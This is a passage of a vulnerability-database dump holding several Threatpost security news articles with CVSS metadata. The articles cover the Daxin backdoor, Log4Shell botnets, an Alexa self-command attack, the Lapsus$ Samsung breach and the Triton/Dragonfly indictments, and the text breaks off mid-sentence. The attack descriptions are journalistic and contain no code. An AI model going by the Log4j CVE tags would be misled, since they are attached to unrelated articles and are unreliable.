standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement. _\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.\n\nAs energy news outlet E&E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh\u2019s sprawling refinery along Saudi Arbia\u2019s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline \u201cin a last-gasp effort to prevent a gas release and deadly explosion.\u201d\n\n\u201c[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,\u201d according to E&E News.\n\nGladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.\n\n## FSB Officers\u2019 Indictment: The Dragonfly Supply-Chain Attack\n\nThe indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, \u201cin furtherance of the Russian government\u2019s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.\u201d\n\nSpecifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\n\u201cAccess to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,\u201d according to the DOJ\u2019s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).\n\nThe indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as \u201cDragonfly\u201d or \u201cHavex\u201d by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.\n\nIt involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.\n\n\u201cAfter unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims\u2019 networks for additional ICS/SCADA devices,\u201d according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.\n\n## Dragonfly 2.0: Spearphishing a Nuclear Power Plant\n\nBetween 2014 and 2017, the campaign entered into what\u2019s commonly referred to as \u201cDragonfly 2.0,\u201d wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.\n\nThis second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.\n\nThe spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.\n\n\u201cMoreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,\u201d according to the DOJ.\n\nDragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software ](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>)(CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. \u201cWhen the engineers browsed to a compromised website, the conspirators\u2019 hidden scripts deployed malware designed to capture login credentials onto their computers,\u201d the DOJ said.\n\nThe campaign targeted victims in the United States and in more than 135 other countries, the Feds said.\n\nThe FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and commit computer fraud and abuse and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers. Akulov and Gavrilov are also charged with three counts of aggravated identity theft.\n\n## Still Gaping Security Holes in Energy Companies\n\nLookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They\u2019re a \u201cpositive move [that] sends a strong message to cybercrime and nation-state actors globally,\u201d he said via email.\n\nOn the less-positive side, a recent LookingGlass cyber profile of the U.S. Energy sector looks grim.\n\nMany energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.\n\nThe report shares vulnerabilities and exposures that Russian hackers are known to have used. \u201cFor years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,\u201d Louie noted.\n\nBut he stated that \u201corganizations also need to ensure they\u2019re improving security on their traditional IT side.\u201d He pointed to the Colonial Pipeline attack as an example of how adversaries \u201cdidn\u2019t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.\u201d \n\nLookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven\u2019t been dealt with, and open ports like remote desktop that are \u201cbasically unprotected doors into an organization.\u201d\n\nEnergy companies need to be patching or updating their systems, Louie said and shutting those open doors: \u201cIf they really need a 